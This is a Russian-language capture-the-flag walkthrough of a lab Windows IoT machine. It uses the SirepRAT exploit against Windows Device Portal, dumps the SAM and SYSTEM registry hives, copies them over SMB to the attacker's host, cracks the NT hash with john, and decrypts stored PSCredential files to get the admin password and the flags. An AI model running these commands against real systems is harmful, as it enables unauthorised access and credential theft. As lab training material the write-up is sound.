Обзор сервисов
Начнем со сканирования портов с помощью nmap
машины 10.10.10.204
:
$ nmap -sC -sV -p- -Pn -v 10.10.10.204
$ nmap --privileged -sU -sV -p- -Pn -v 10.10.10.204
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=5/29%Time=60B25E0D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Обнаруживаем Windows Device Portal, для которого воспользуемся публичным эксплоитом:
git clone https://github.com/SafeBreach-Labs/SirepRAT
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
Дампнем файлы SAM
и SYSTEM
:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SYSTEM C:\SYSTEM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SAM C:\SAM"
Запустим локальный сервер Samba, чтобы скачать файлы, и скопируем к себе на машину:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SAM \\\\10.10.14.6\\Public\\SAM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SYSTEM \\\\10.10.14.6\\Public\\SYSTEM"
Запустим брутфорс:
$ samdump2 SYSTEM SAM > hash
$ echo "aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95" > hash.txt
$ john --fork=4 --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
app:mesh5143
Перейдем на http://10.10.10.204:8080/#Device%20Settings и введем полученные креды.
Пользовательский флаг
Command> dir C:\data\users\app
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\data\users\app
07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 07:28 PM <DIR> 3D Objects
07/04/2020 07:28 PM <DIR> Documents
07/04/2020 07:28 PM <DIR> Downloads
07/04/2020 07:28 PM <DIR> Favorites
07/04/2020 08:20 PM 344 hardening.txt
07/04/2020 08:14 PM 1,858 iot-admin.xml
07/04/2020 07:28 PM <DIR> Music
07/04/2020 07:28 PM <DIR> Pictures
07/04/2020 09:53 PM 1,958 user.txt
07/04/2020 07:28 PM <DIR> Videos
3 File(s) 4,160 bytes
9 Dir(s) 4,692,443,136 bytes free
Command> type C:\data\users\app\hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
Command> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::4943:80ed:ab82:e853
Temporary IPv6 Address. . . . . . : dead:beef::2d12:c117:bdc3:a673
Link-local IPv6 Address . . . . . : fe80::4943:80ed:ab82:e853%4
IPv4 Address. . . . . . . . . . . : 10.10.10.204
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
10.10.10.2
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\iot-admin.xml;$credential.GetNetworkCredential().password"
Omni\Administrator:_1nt3rn37ofTh1nGz
powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"
7cfd50f6bc34db3204898f1505ad9d70
Перелогинимся в качестве администратора.
Флаг суперпользователя
$ powershell -c "$credential = import-clixml -path C:\Data\Users\administrator\root.txt;$credential.GetNetworkCredential().password"
5dbdce5569e2c4708617c0ce6e9bf11d